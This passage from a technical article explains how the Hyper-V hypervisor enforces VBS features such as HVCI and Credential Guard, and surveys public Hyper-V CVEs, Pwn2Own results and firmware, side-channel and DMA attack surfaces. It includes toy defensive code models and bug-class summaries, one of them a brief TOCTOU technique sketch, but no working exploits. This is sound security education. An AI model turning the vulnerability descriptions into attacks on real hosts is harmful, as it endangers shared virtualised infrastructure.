Intercept: A configurable hypervisor notification on a specific guest event. The hypervisor programs the VMCS or VMCB to fire a VM-EXIT when the guest issues a particular instruction, raises a particular exception, accesses a particular memory region, or transitions to a particular state. Intercepts are the policy mechanism that lets the hypervisor implement device emulation, security checks, and VTL transitions [@ms-tlfs-pdf].

For VBS, the load-bearing intercept is the memory-access intercept. When VTL0 code tries to access a region whose VTL0 SLAT mapping is unreadable or unwritable, the access traps to the hypervisor with the offending GPA; the hypervisor can deliver the intercept to the VTL1 Secure Kernel as a secure call, letting VTL1 see what VTL0 was trying to do and decide whether to allow it. This is how HVCI's W^X enforcement is wired: a VTL0 page that is marked writable in VTL0's SLAT is marked non-executable in the same SLAT; an attempt to switch the same page to executable becomes a memory-access intercept that VTL1 must approve.
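The W^X flow in the paragraph above can be modeled in a few lines. This is a toy sketch under stated assumptions: the class `Vtl0Slat`, the `requestChange` method, and the `approve` callback are hypothetical names, and the real approval logic lives in the Secure Kernel rather than in anything resembling this code.

```javascript
// Toy model of W^X enforcement on VTL0 SLAT permissions. All names are
// hypothetical; only the decision shape follows the surrounding text.
class Vtl0Slat {
  constructor() {
    this.perms = new Map(); // guest page address -> { r, w, x }
  }
  map(page, perms) {
    this.perms.set(page, { ...perms });
  }
  // VTL0 asks for a permission change. Any request that would grant +X is
  // routed to the VTL1 approver, mimicking a memory-access intercept.
  requestChange(page, wanted, vtl1Approve) {
    if (!this.perms.has(page)) return 'no-mapping';
    if (wanted.w && wanted.x) return 'denied';            // never writable and executable
    if (wanted.x && !vtl1Approve(page)) return 'denied';  // VTL1 must vet new code
    this.perms.set(page, { ...wanted });
    return 'granted';
  }
}

const slat = new Vtl0Slat();
slat.map(0x1000, { r: true, w: true, x: false });
slat.map(0x2000, { r: true, w: true, x: false });

// Assumption for the demo: VTL1 has verified the contents of page 0x2000 only.
const verifiedPages = new Set([0x2000]);
const approve = (page) => verifiedPages.has(page);

console.log(slat.requestChange(0x1000, { r: true, w: true, x: true }, approve));  // denied
console.log(slat.requestChange(0x1000, { r: true, w: false, x: true }, approve)); // denied
console.log(slat.requestChange(0x2000, { r: true, w: false, x: true }, approve)); // granted
```

The point of the model is the ordering: the W+X check is unconditional, and the approver is consulted only for requests that would add execute permission.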

7.4 The Synthetic Interrupt Controller (SynIC)

The Synthetic Interrupt Controller, SynIC, is the hypervisor's per-virtual-processor event delivery surface. Each VP has 16 Synthetic Interrupt Source (SINT) lines, a message page (where the hypervisor places message-shaped events), an event-flag page (where it places bit-flag events), and a set of synthetic timers. SynIC is the bus on which VMBus traffic between VSP and VSC moves; it is also the bus on which VTL transitions between VTL0 and VTL1 are delivered inside the root partition [@ms-tlfs-pdf].

SynIC: A hypervisor-emulated interrupt controller, parallel to the hardware APIC, that delivers hypervisor-originated events to a virtual processor. Each VP has 16 SINT lines, a message page, an event-flag page, and synthetic timers. VMBus signaling rides on SynIC; secure-call delivery between VTL0 and VTL1 rides on SynIC; vTPM, virtual-PCI, and other paravirtualized device events ride on SynIC [@ms-tlfs-pdf].

For VBS, the secure-call ABI -- the way VTL0 code asks VTL1 to do something -- is built on SynIC. A VTL0 caller writes a request into a shared message page, signals a SINT, and yields the CPU; the hypervisor switches SLAT context to VTL1, delivers the message, and lets VTL1 read the request. When VTL1 finishes, it signals a SINT back to VTL0 and the hypervisor switches contexts again. Credential Guard's whole communication path between VTL0 LSASS and VTL1 LSAISO is one of these secure-call channels.
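The round trip described above can be sketched as a small state machine. Everything named here is an assumption made for illustration: `SecureCallChannel`, the `SECURE_CALL_SINT` index, and the `echoLength` service do not correspond to real Windows identifiers. Only the sequence (write request, signal, switch to VTL1, dispatch, switch back) follows the text.

```javascript
// Toy model of a secure call round trip. Hypothetical names throughout.
const SINT_COUNT = 16;       // each virtual processor has 16 SINT lines
const SECURE_CALL_SINT = 2;  // assumed SINT index, chosen only for this demo

class SecureCallChannel {
  constructor(vtl1Services) {
    this.messagePage = null;        // stands in for the shared message page
    this.activeVtl = 0;
    this.vtl1Services = vtl1Services;
    this.trace = [];                // records each context switch
  }
  // VTL0 side: write the request, signal the SINT, wait for the reply.
  call(service, payload) {
    this.messagePage = { service, payload };
    return this.signal(SECURE_CALL_SINT);
  }
  // Hypervisor side: switch to VTL1, deliver the message, switch back.
  signal(sint) {
    if (sint < 0 || sint >= SINT_COUNT) throw new RangeError('bad SINT index');
    this.switchTo(1);
    const { service, payload } = this.messagePage;
    const handler = this.vtl1Services[service];
    const reply = handler ? handler(payload) : { status: 'unknown-service' };
    this.switchTo(0);
    return reply;
  }
  switchTo(vtl) {
    this.activeVtl = vtl;
    this.trace.push('VTL' + vtl);
  }
}

const channel = new SecureCallChannel({
  echoLength: (payload) => ({ status: 'ok', length: payload.length }),
});
console.log(channel.call('echoLength', 'hello')); // status 'ok', length 5
console.log(channel.trace.join(' -> '));          // VTL1 -> VTL0
```

Note that the caller never holds a reference to the VTL1 handler; it can only name a service and receive a reply, which is the property the real ABI is built to guarantee.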

7.5 Memory and per-VTL SLAT

The last surface is also the most important: memory. Guest physical addresses (GPAs) are translated to system physical addresses (SPAs) by per-partition SLAT page tables. The hypervisor has exclusive control of these tables; no partition, including the root, can read or modify them directly. For VBS specifically, the hypervisor maintains two SLAT mappings per partition -- one for VTL0 and one for VTL1 -- and switches between them on VTL transitions.

This is the architectural reason VTL0 kernel mode, even with full Ring-0 code execution, cannot read or execute VTL1 memory. The VTL0 page-table walker on a load from a VTL1-only page does not see the page at all; the SLAT walker on the host returns no mapping; the hardware MMU raises an EPT/NPT violation; the hypervisor handles the violation according to the VTL0 partition's intercept policy. In the security-relevant case, the hypervisor delivers an access-denied result to VTL0 and continues. There is no kernel-mode mov instruction sequence that can defeat this, because the gating happens in hardware page-table walks that VTL0 kernel mode cannot influence.
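A minimal sketch of the two-view idea, assuming a flat map per VTL in place of real EPT/NPT page tables. The `Partition` class and its method names are hypothetical; the only thing taken from the text is that the same guest-physical address can resolve in one VTL's view and fault in the other.

```javascript
// Toy model: one partition, two GPA -> SPA maps, one per VTL.
// Hypothetical names; real SLAT tables are hardware page tables (EPT/NPT).
class Partition {
  constructor() {
    this.slat = [new Map(), new Map()]; // index 0 = VTL0 view, index 1 = VTL1 view
  }
  // Install a mapping in the views of the listed VTLs only.
  mapPage(gpa, spa, vtls) {
    for (const vtl of vtls) this.slat[vtl].set(gpa, spa);
  }
  // Translate a guest-physical address as seen from the given VTL.
  translate(vtl, gpa) {
    const spa = this.slat[vtl].get(gpa);
    if (spa === undefined) return { fault: 'slat-violation', gpa };
    return { spa };
  }
}

const root = new Partition();
root.mapPage(0x10000, 0xA0000, [0, 1]); // ordinary page: visible to both VTLs
root.mapPage(0x20000, 0xB0000, [1]);    // secret page: mapped for VTL1 only

console.log(root.translate(1, 0x20000)); // resolves to an SPA
console.log(root.translate(0, 0x20000)); // faults: no mapping in the VTL0 view
```

Nothing VTL0 does to its own page tables changes the outcome, because the lookup that fails is in a structure VTL0 has no handle to.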

Five surfaces. Two of them -- the hypercall ABI and the device-emulation paths that surface over VMBus -- are where every public Hyper-V escape since 2018 has lived. The other three (intercepts, SynIC, per-VTL SLAT) are the substrate on which VBS, HVCI, Credential Guard, and System Guard Secure Launch are built. We turn to those next.

8. How the Hypervisor Enforces Each VBS Feature

The hypervisor itself does not know anything about credentials, code signing, application allowlisting, or DMA protection. It knows about partitions, VTLs, intercepts, SLAT entries, and hypercalls. Each Windows security feature is built by composing those primitives in a specific way. The mapping is precise and worth walking, because it is what makes the substrate a security primitive rather than just a virtualization product [@ms-hardware-root-of-trust].

HVCI / Memory Integrity. Hypervisor-protected Code Integrity is the most consequential VBS feature on a per-byte basis: it changes Windows from a system that lets the kernel execute any signed driver to one where the kernel cannot execute any page until VTL1 has approved it. VTL1's code-integrity service inspects every kernel-mode page mapping change request before the SLAT entry that would make the page executable in VTL0 is granted. The W^X invariant -- a single page can be writable or executable, but never both -- is enforced not by NT kernel cooperation but by the per-VTL SLAT, exactly as described in section 7.5. An NT-kernel attempt to mark a writable page executable becomes a memory-access intercept that VTL1's CI service evaluates [@ms-enable-vbs-hvci]. The hypervisor primitives composed: per-VTL SLAT + memory-access intercepts + secure-call ABI.

Trustlet: A user-mode process that runs inside VTL1's Isolated User Mode (IUM). Trustlets must be signed with the Windows System Component Verification certificate (Signature Level 12) and carry the IUM EKU `1.3.6.1.4.1.311.10.3.37`. The shipping inbox trustlets include `LSAISO.EXE` (Credential Guard), `VMSP.EXE` (host side of virtual TPM), and the vTPM provisioning trustlet [@ms-iso-user-mode-trustlets, @ionescu-bh-2015].

Credential Guard. LSAISO.EXE -- the LSA-Isolated trustlet -- runs in VTL1 Isolated User Mode. NTLM password hashes and Kerberos Ticket-Granting Tickets that LSASS used to keep in normal VTL0 memory are moved to VTL1 memory that VTL0 cannot read. VTL0 LSASS performs credential operations by sending a request to LSAISO over a secure-call channel mediated by the hypervisor's SynIC; LSAISO does the cryptographic work and returns a result. The plaintext of the credential never leaves VTL1. This is why a Ring-0 attacker on a Credential Guard-enabled Windows install cannot dump LSASS hashes -- they aren't in LSASS [@ms-iso-user-mode-trustlets]. The hypervisor primitives composed: per-VTL SLAT (to hide LSAISO's memory) + SynIC (to deliver secure calls) + intercepts (to catch VTL0 attempts to access LSAISO memory). See the sibling Credential Guard / NTLMless article for VTL1 internals.
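The "operate on the secret without exposing it" pattern can be sketched with a closure standing in for the isolated trustlet. This is an analogy rather than a description of LSAISO internals: `createIsolatedLsa` and `respondToChallenge` are hypothetical names, and HMAC-SHA256 is a stand-in for the real NTLM and Kerberos operations. The crypto calls are from Node's built-in `crypto` module.

```javascript
const { createHmac, randomBytes } = require('crypto');

// Toy model: the secret lives only inside the closure that stands in for
// the isolated trustlet. The caller gets an operation, never the key.
function createIsolatedLsa() {
  const secret = randomBytes(32); // never returned or stored on the object
  return {
    // The only exposed operation: compute a keyed response to a challenge.
    respondToChallenge(challenge) {
      return createHmac('sha256', secret).update(challenge).digest('hex');
    },
  };
}

const lsaiso = createIsolatedLsa();
const response = lsaiso.respondToChallenge('server-nonce-1234');

console.log(response.length);     // 64 (hex characters of a SHA-256 HMAC)
console.log(Object.keys(lsaiso)); // [ 'respondToChallenge' ]
```

A JavaScript closure is only a language-level boundary; the real feature gets its strength from the per-VTL SLAT, which is why a VTL0 kernel debugger or driver cannot simply walk memory to find the key.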

Secure call: The VTL0-to-VTL1 calling convention. A VTL0 caller fills in a shared parameter page, signals a SynIC interrupt configured for VTL transition, and yields. The hypervisor switches SLAT context to VTL1, delivers the message, and lets the Secure Kernel dispatch it via `IumInvokeSecureService` to a registered VTL1 service. On return, the hypervisor switches contexts back. The whole round-trip is mediated by hypervisor primitives the calling VTL cannot bypass [@ionescu-bh-2015].

Application Control (WDAC). The same VTL1 code-integrity service that backs HVCI also evaluates user-mode policy. When VTL0 user mode tries to load a binary that is restricted by WDAC policy, the load becomes a secure call into VTL1; VTL1's policy engine evaluates the signature, the certificate chain, and the configured policy; the secure call returns approval or denial. WDAC policy lives in VTL1, the policy database lives in VTL1, and a VTL0 administrator who has been compromised cannot edit either. The hypervisor primitives composed: same as HVCI, plus a richer secure-call API for policy evaluation.

VBS Enclaves. A third-party application can load native code into a VTL1 IUM enclave. The enclave executes in VTL1, with its memory hidden from VTL0; the application talks to the enclave through a secure-call ABI exposed by the Secure Kernel. Architecturally parallel to Credential Guard but available to ordinary application developers. The hypervisor primitives composed: per-VTL SLAT (to hide enclave memory) + secure-call ABI (to invoke enclave code) + a Secure Kernel API for enclave creation, attestation, and destruction.

System Guard Secure Launch (DRTM). Intel TXT's SENTER instruction (and AMD's SKINIT on AMD platforms) executes a hardware-rooted dynamic measurement of the hypervisor and the Secure Kernel into TPM PCRs 17-22 after firmware initialization [@ms-system-guard-secure-launch]. This re-establishes the trust root post-firmware: a pre-boot firmware compromise that survived UEFI Secure Boot cannot silently poison the hypervisor's launch state without showing up as an unexpected measurement in a PCR that VTL1 can read. The hypervisor primitives composed: DRTM event registration with the hardware + TPM PCR extension + a VTL1-side attestation API. See the sibling Secure Boot article for the static-RTM half of the same story.

Kernel DMA Protection. External devices over Thunderbolt, USB4, or hot-plug PCIe can issue DMA to arbitrary physical addresses, bypassing the CPU's MMU entirely. The hypervisor configures the IOMMU (Intel VT-d / AMD-Vi) to deny DMA from externally-attached devices outside of explicitly-authorized memory regions, and to refuse DMA from any device before its kernel-mode driver has been loaded under a trusted policy [@ms-kernel-dma-protection]. The hypervisor primitives composed: hypervisor-owned IOMMU configuration + memory-access intercepts on the IOMMU configuration MMIO region.
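The allowlist behavior can be modeled as a bounds check per device. This is a sketch under simplifying assumptions: the `Iommu` class, the device identifiers, and the flat region list are hypothetical, whereas real VT-d and AMD-Vi use per-device translation tables.

```javascript
// Toy model of an IOMMU allowlist. Hypothetical names and region format.
class Iommu {
  constructor() {
    this.allowed = new Map(); // deviceId -> array of { start, end } (end exclusive)
  }
  // Authorize a device to DMA into [start, start + length).
  authorize(deviceId, start, length) {
    const regions = this.allowed.get(deviceId) || [];
    regions.push({ start, end: start + length });
    this.allowed.set(deviceId, regions);
  }
  // A DMA request passes only if it fits entirely inside one authorized region.
  checkDma(deviceId, addr, length) {
    const regions = this.allowed.get(deviceId) || [];
    return regions.some((r) => addr >= r.start && addr + length <= r.end);
  }
}

const iommu = new Iommu();
iommu.authorize('thunderbolt-dock', 0x100000, 0x1000);

console.log(iommu.checkDma('thunderbolt-dock', 0x100800, 0x100)); // true
console.log(iommu.checkDma('thunderbolt-dock', 0x100F00, 0x200)); // false: runs past the region
console.log(iommu.checkDma('unknown-device', 0x100000, 0x10));    // false: nothing authorized
```

A device with no entry is denied by default, which mirrors the "no DMA before a trusted driver is loaded" rule in the paragraph above.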

The shape of the table is the point.

| Feature | Composed primitives | Verbatim hypervisor mechanism |
|---|---|---|
| HVCI | per-VTL SLAT + memory-access intercepts + secure-call ABI | VTL1 vets each VTL0 page-mapping change before granting +X |
| Credential Guard | per-VTL SLAT + SynIC + intercepts | LSAISO trustlet memory absent from VTL0 SLAT mapping |
| WDAC (AppControl) | secure-call ABI + VTL1 policy engine | VTL0 binary load = secure call into VTL1 CI service |
| VBS Enclaves | per-VTL SLAT + secure-call ABI | Third-party VTL1 IUM enclave invoked over secure call |
| System Guard Secure Launch | hardware DRTM (TXT/SKINIT) + TPM PCR extension | `SENTER` / `SKINIT` measures hypervisor into PCRs 17-22 |
| Kernel DMA Protection | hypervisor-owned IOMMU + MMIO intercepts | VT-d/AMD-Vi denies DMA outside authorized regions |

The hypervisor knows nothing about NTLM hashes, Kerberos tickets, code-signing certificates, WDAC policy XML, or DMA-region authorization. All of that policy lives in VTL1 -- in the Secure Kernel, in LSAISO, in the WDAC service. The hypervisor only provides the *mechanism* for one piece of policy to evaluate a request from another piece of policy in isolation. This is the architectural separation that lets the hypervisor binary stay small and the Windows-side security feature set keep growing.

The pattern: each feature is a different composition of the same five primitives (partitions, hypercalls, intercepts, SynIC, per-VTL SLAT). The hypervisor is genuinely a primitive in the formal sense -- a small set of mechanisms that compose into many security policies. If the hypervisor is the mechanism, the boundary the hypervisor enforces is the contract. Microsoft commits to servicing certain attacks against that boundary and explicitly excludes others. To know what we are getting, we need to read the contract.

9. The Security Boundary Microsoft Commits To

The Microsoft Security Servicing Criteria for Windows is a public document. It enumerates which classes of attack Microsoft will issue a CVE and an out-of-band patch for, and which it will not. For the hypervisor, the document is unusually specific [@ms-msrc-servicing-criteria].

The two relevant boundaries:

Hypervisor / virtualization boundary. An L1-guest-to-host or guest-to-guest break is a serviced boundary. If a guest VM can execute code in the root partition or in another guest's address space, Microsoft will issue a CVE.
VBS / Virtual Secure Mode (VSM) boundary. VTL0 kernel-mode code reading or writing VTL1 memory, or executing VTL1 code, is a serviced break. If a Ring-0 attacker in VTL0 can defeat the per-VTL SLAT, Microsoft will issue a CVE.

What the servicing criteria do not commit to is also worth naming. A same-VTL elevation of privilege inside a guest (a guest user becoming guest SYSTEM) is not a hypervisor break -- it is a Windows EoP, serviced under the Windows kernel boundary, not the hypervisor boundary. A denial-of-service of the host from a guest is generally not a serviced hypervisor break unless it produces a memory corruption that an attacker can ride to RCE. An administrator in the root partition reading guest memory is not a break at all -- the root partition is part of the hypervisor's TCB by definition, and root-partition admin is hypervisor-admin in the threat model.

The dollar figures for these boundaries are documented in the Microsoft Hyper-V Bounty Program [@ms-msrc-bounty-hyperv]. The program ranges from $5,000 for the lowest-impact qualifying submission up to $250,000 for the highest. The eligibility language is verbatim:

An eligible submission includes a Remote Code Execution (RCE) vulnerability in Microsoft Hyper-V that enables a L1 guest virtual machine to compromise the hypervisor, escape from the guest virtual machine to the host, or escape to another L1 guest virtual machine. -- Microsoft Hyper-V Bounty Program [@ms-msrc-bounty-hyperv]

$250,000 is the highest standing Hyper-V bounty in the industry. Comparable programs from the other major hypervisor vendors do not publish the same calibration. KVM is a community project with no vendor-paid bounty pool of equivalent size. Xen is a Linux Foundation project that runs a bug bounty through HackerOne but does not publicly attach a $250,000 figure to a guest-to-host RCE. ESXi (Broadcom) does not publish a standing bounty program with a per-bug ceiling; bounty payments for ESXi RCEs typically flow through Pwn2Own and similar marketplaces, where Trend Micro's Zero Day Initiative sets the prize for any given competition.

The bounty calibration is itself a data point. If $250,000 were too high, Microsoft would be drowning in submissions; if it were too low, the public CVE record would show more hypervisor breaks reported through Pwn2Own than directly to MSRC. The current equilibrium -- two to four Microsoft-direct Hyper-V CVEs per year, plus zero Pwn2Own Hyper-V guest-to-host escapes through Pwn2Own Berlin 2025 [@zdi-pwn2own-day3] -- is consistent with the bounty being calibrated roughly correctly relative to the cost of finding a real bug.

| Vendor | Hypervisor | Published bounty | Ceiling | Servicing-criteria boundary published |
|---|---|---|---|---|
| Microsoft | Hyper-V / `hvix64.exe` | Yes | $250,000 | Yes, verbatim language |
| Xen Project | Xen | Yes (HackerOne) | Lower, varies | Yes, security policy |
| KVM | KVM (community) | No standing program | -- | No vendor-published criteria |
| Broadcom/VMware | ESXi | No standing public bounty | -- | Vendor advisories per CVE |
| seL4 Project | seL4 | No (proof-rooted argument) | -- | Functional-correctness proof [@sel4-whitepaper] |

The seL4 row is included because seL4 is the only hypervisor in the table whose claim to a security boundary is mathematical rather than operational. seL4 ships approximately ten thousand lines of C and assembly with a machine-checked proof of functional correctness against a higher-level specification. The proof took roughly twenty-five person-years and covers a microkernel that does not by itself ship the full surface area of Hyper-V. The Microsoft hypervisor is unverified and, at the line count estimated in section 7, at least an order of magnitude larger; its security argument is operational (a small TCB, heavy fuzzing, a standing bounty, public servicing) rather than mathematical.

A serviced boundary is a contract. Contracts are not promises; they are obligations that come due when an attacker finds a way around them. To see what the contract has actually had to pay out, we read the public CVE record.

10. The Public Track Record -- Six Worked CVEs Across Three Classes

We do not need an exhaustive Hyper-V CVE catalog to understand the boundary's real shape. Six worked examples, drawn from three distinct attack classes, cover every public failure mode the boundary has produced since 2018. We walk them in order.

Class A: Device emulation in the root partition

CVE-2021-28476 (vmswitch.sys, May 2021, CVSS 9.9). Discovered by Ophir Harpaz at Guardicore Labs and Peleg Hadar at SafeBreach Labs using Guardicore's hAFL1 hypervisor fuzzer, the bug sat in how the host-side vmswitch.sys driver handled a guest-controlled OID_SWITCH_NIC_REQUEST parameter. The driver dereferenced an attacker-influenced object pointer, so the host kernel performed an arbitrary pointer dereference and the guest gained RCE in the root partition's kernel mode. The CVSS 9.9 score (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) reflects guest-to-host RCE with Azure-scale blast radius: the bug was reachable from the vmswitch driver shipped in Windows builds well before the May 2021 patch, per the Guardicore Labs technical analysis [@nvd-cve-2021-28476]. The bug is the canonical anchor for "device emulation in the root partition is the largest Hyper-V attack surface."

CVE-2025-21333 (NT Kernel Integration VSP, January 2025, CWE-122). The first publicly-acknowledged in-the-wild exploited Hyper-V CVE. The "Hyper-V NT Kernel Integration VSP" is a relatively new component that ties the Windows kernel-mode container architecture to Hyper-V's VSP/VSC pattern. A guest-controlled input triggered a heap-based buffer overflow on the host side of the integration; the host's address space was corruptible from a guest [@nvd-cve-2025-21333]. The operational pattern matches the vmswitch family: a host-side component receives structured, attacker-shaped input from a guest, and the host-side component overflows.

Class B: The hypercall input-validation path

CVE-2024-21407 (Hyper-V hypercall UAF, March 2024, CVSS 8.1, CWE-416). The rare case where the bug is in hvix64.exe / hvax64.exe itself, not in a root-partition driver. A guest crafted specially-formed file-operation hypercalls; the hypervisor dereferenced freed memory; the guest gained arbitrary host code execution [@nvd-cve-2024-21407].

CVE-2024-30092 (Hyper-V RCE, October 2024, CWE-20 + CWE-829). A Hyper-V remote code execution that combined improper input validation with inclusion of functionality from an untrusted control sphere -- another hypercall-path-class bug [@nvd-cve-2024-30092].

CVE-2024-49117 (Hyper-V RCE, December 2024, CVSS 8.8). A third 2024 Hyper-V RCE; the December Patch Tuesday entry rounded out a year in which three publicly-disclosed Hyper-V RCEs landed in twelve months, the most since the 2018 vmswitch family [@nvd-cve-2024-49117].

Class C: VTL0-to-VTL1 (the VBS break, not the hypervisor break)

CVE-2020-0917 and CVE-2020-0918 -- Amar and King, Black Hat USA 2020. Saar Amar and Daniel King's "Breaking VSM by Attacking SecureKernel" disclosed two paired vulnerabilities discovered with their Hyperseed hypercall fuzzer retargeted at securekernel!IumInvokeSecureService, the secure-call entry point. Vulnerability #1 -- which maps to CVE-2020-0917 -- is an out-of-bounds write in securekernel!SkmmObtainHotPatchUndoTable, the function that parses the hot-patch undo table at secure-call invocation time. Vulnerability #2 -- CVE-2020-0918 -- is a design flaw in SkmmUnmapMdl that lets VTL0 pass a fully attacker-controlled Memory Descriptor List to SkmiReleaseUnknownPTEs.

The Black Hat USA 2020 deck (verified via pdftotext at the canonical MSRC-Security-Research GitHub URL) explicitly labels Vulnerability #1 as OOB Write, in slides titled "The Vulnerable Function" and "The OOB" in the "Hardening SK" section [@amar-king-bh-2020]. Several secondary writeups across the web have transcribed the bug class as "OOB read," which is incorrect; the deck itself is the primary source and says write. The functions involved are also commonly conflated: IumInvokeSecureService is the secure-call dispatcher Hyperseed retargets to reach the buggy code; the actual bug is in SkmmObtainHotPatchUndoTable. The NVD entries for both CVEs are tracked as CWE-269 (Improper Privilege Management).

The Microsoft response is documented end-to-end in the same deck: the Secure Kernel pool was migrated to segment heap in mid-2019, four W+X regions were reduced to +X only, and SkpgContext -- a HyperGuard equivalent for Secure Kernel -- was introduced.

This is a different failure class than vmswitch RCE: not guest-to-host, but VTL0-to-VTL1 -- a Secure Kernel break reached through the hypervisor's secure-call dispatch from a privileged VTL0 attacker. Microsoft services it under the VBS / VSM boundary in the servicing criteria document, even though no guest VM is involved.

Key idea: Every public Hyper-V CVE since 2018 lives in one of three narrow code paths -- device emulation, hypercall input validation, or VTL0-to-VTL1 secure-call dispatch. The TLFS-visible primitives (intercepts, SynIC, per-VTL SLAT) have produced none.

The Pwn2Own dimension

Through Pwn2Own Berlin 2025, no public live Hyper-V guest-to-host escape has been demonstrated at Pwn2Own. The cross-vendor analogue -- and the industry's best calibration of how hard a hypervisor escape is to find when a researcher has a public dollar incentive and a deadline -- is the first-ever ESXi escape in Pwn2Own history, executed by Nguyen Hoang Thach of STAR Labs SG on Day Two (May 16, 2025) using a single integer overflow vulnerability in the hypervisor's DMA-handling path. The award was $150,000 plus 15 Master of Pwn points; STAR Labs went on to win overall Master of Pwn for the competition with $320,000 across three days [@zdi-pwn2own-day3].

The technique class is a TOCTOU on a length field read twice during a DMA operation: the first read validates the length, the second read uses it; race the second read and you write past a fixed-size buffer on the host heap. The exploit class is structurally the same as the vmswitch family, just landed in a different vendor's device-emulation path.

| CVE | Class | Year | CVSS | Location | Source |
|---|---|---|---|---|---|
| CVE-2021-28476 | A: device emulation | 2021 | 9.9 | `vmswitch.sys` (root partition) | [@nvd-cve-2021-28476] |
| CVE-2025-21333 | A: device emulation | 2025 | 7.8 | NT Kernel Integration VSP (root partition) | [@nvd-cve-2025-21333] |
| CVE-2024-21407 | B: hypercall path | 2024 | 8.1 | `hvix64.exe` / `hvax64.exe` (hypervisor binary) | [@nvd-cve-2024-21407] |
| CVE-2024-30092 | B: hypercall path | 2024 | 7.5 | Hyper-V hypercall validation | [@nvd-cve-2024-30092] |
| CVE-2024-49117 | B: hypercall path | 2024 | 8.8 | Hyper-V hypercall validation | [@nvd-cve-2024-49117] |
| CVE-2020-0917/0918 | C: VTL0-to-VTL1 | 2020 | 6.8 (per MSRC) | `securekernel.exe` (VTL1, reached via secure call) | [@amar-king-bh-2020] |

```mermaid
flowchart LR
  subgraph CA["Class A: device emulation (root partition)"]
    Vmswitch["vmswitch.sys -- CVE-2021-28476"]
    Vsp["NT Kernel Integration VSP -- CVE-2025-21333"]
  end
  subgraph CB["Class B: hypercall input validation (hypervisor binary)"]
    UAF["CVE-2024-21407 (UAF)"]
    Input["CVE-2024-30092"]
    Hpcall["CVE-2024-49117"]
  end
  subgraph CC["Class C: VTL0-to-VTL1 (secure call dispatch)"]
    Oob["CVE-2020-0917 (OOB write)"]
    Mdl["CVE-2020-0918 (SkmmUnmapMdl)"]
  end
  Guest["Guest VM"] --> CA
  Guest --> CB
  Vtl0["Privileged VTL0 (kernel)"] --> CC
```

This is the third insight the article is built around. The reader's prior model may have been "hypervisors fail in mysterious, deep ways; the boundary is fragile in unknown places." The new model is "every public Hyper-V escape since 2018 lives in one of three narrow code paths, and the TLFS-visible primitives have produced none." The narrowness of the failure space is itself a security argument. The hypervisor's micro-kernelized design has held; what has not always held are the components Microsoft chose to put next to the hypervisor, in the root partition's user mode and kernel mode, by deliberate architectural choice in 2008.

Six worked examples; three classes; one boundary; an unflinching public record. The boundary is alive and producing CVEs at roughly two to four per year. But every CVE so far has lived somewhere the hypervisor itself controls. The interesting question is what lives in places it does not control.

11. The Residual Attack Surface -- Beneath, Beside, and Around

The hypervisor enforces a clean boundary against everything above it -- the NT kernel, user mode, even other guest VMs. It cannot, by construction, enforce anything against what lives below or beside it. Three structural classes of residual attack matter. We walk each.

11.1 Firmware below the hypervisor

System Management Mode (SMM), the UEFI runtime, the platform Manageability Engine (Intel ME), and the AMD Platform Security Processor (PSP) all run at higher privilege than the hypervisor for parts of boot and runtime. SMM in particular is a CPU mode that is invoked through System Management Interrupts (SMI) and has unrestricted access to all of physical memory, including the hypervisor's own pages. If the OEM-supplied SMM handler contains an exploitable bug, an SMI can run attacker code in a privilege mode strictly above the hypervisor's.

The threat is not hypothetical. The Binarly research team's 2023 LogoFAIL disclosures showed entire classes of image-parser bugs in UEFI firmware reachable from a privileged OS context; BootHole (CVE-2020-10713, a buffer overflow in GRUB2's grub.cfg parser) and BlackLotus (CVE-2022-21894, a UEFI Secure Boot bypass) showed that pre-boot bugs in widely-deployed bootloaders could ride past Secure Boot. None of these is a hypervisor bug; all of them are residual attack surface from the hypervisor's point of view.

Microsoft's mitigation is the dynamic root of trust for measurement -- System Guard Secure Launch -- which we touched on in section 8. After UEFI Secure Boot has done its static-RTM job, Intel TXT's SENTER (or AMD's SKINIT) executes a CPU-hardware-rooted late launch: the CPU resets to a known state, runs an Intel- or AMD-signed Authenticated Code Module (ACM), and measures the hypervisor binary into TPM PCRs 17-22 before transferring control to it. The result is that even if pre-boot firmware is compromised, the post-DRTM PCR values reflect the actual hypervisor binary; a compromised UEFI cannot silently substitute a different hypervisor without changing the attestation [@ms-system-guard-secure-launch, @ms-hardware-root-of-trust]. The residual after DRTM: OEMs that don't ship Secure Launch on their motherboards, or that ship buggy SMM handlers that can be invoked after launch.
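
The measurement step can be written as the standard TPM extend operation. This is a minimal sketch, assuming a single hash bank with hash function $H$ of output length $n$ and assuming the dynamic PCRs are reset to zero at the late-launch event; the symbols $d$ and $n$ are ours, not taken from the cited sources.

```latex
\begin{aligned}
\mathrm{PCR}_i &\leftarrow 0^{n}, && i = 17,\dots,22 \quad \text{(reset at the DRTM event)} \\
\mathrm{PCR}_i &\leftarrow H\bigl(\mathrm{PCR}_i \,\Vert\, d\bigr), && d = H(\text{measured image})
\end{aligned}
```

Because each new value hashes the previous one, the final PCR value commits to the whole ordered sequence of post-launch measurements, and nothing measured before the reset contributes to it.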

11.2 Hardware side channels

Microarchitectural side-channel attacks cross the VTL boundary at the level of CPU implementation, not at the level of architectural specification. The 2018 Spectre and Meltdown disclosures -- followed by the L1TF, MDS, Retbleed, and CacheWarp families in the years since -- showed that speculatively-executed code on a CPU can leak microarchitectural state across privilege boundaries that the architectural ISA promises to protect.

Microsoft's mitigation cadence has been in-tree and aggressive: Kernel Virtual Address Shadow (the Windows equivalent of KPTI) for Meltdown; IBRS, STIBP, and retpolines for Spectre v2; HyperClear for L1TF on Hyper-V hosts. Each Patch Tuesday since 2018 has shipped at least one microarchitectural mitigation; cumulatively the cost has been measurable but bounded.

Note: The microarchitectural ceiling is hardware, not software. Intel TDX and AMD SEV-SNP -- the two confidential-computing architectures that move the trust root from the hypervisor to per-VM hardware encryption -- both explicitly disclaim resistance to this class. If the CPU leaks across a Spectre-class side channel, no software-level isolation primitive (VTL, partition, SEAM, SEV-SNP) can fully recover the property. The mitigation is hardware that doesn't leak, and that mitigation arrives one CPU generation at a time.

11.3 IOMMU and DMA bypass

The IOMMU -- Intel VT-d, AMD-Vi -- is the hardware that gates DMA from peripheral devices to physical memory. If the IOMMU is configured correctly, a Thunderbolt-attached device cannot read or write arbitrary memory; it can only DMA to regions the OS has explicitly mapped for it. If the IOMMU is disabled, configured permissively, or has firmware bugs of its own, DMA becomes an end-run around every architectural protection above it -- including the hypervisor's.

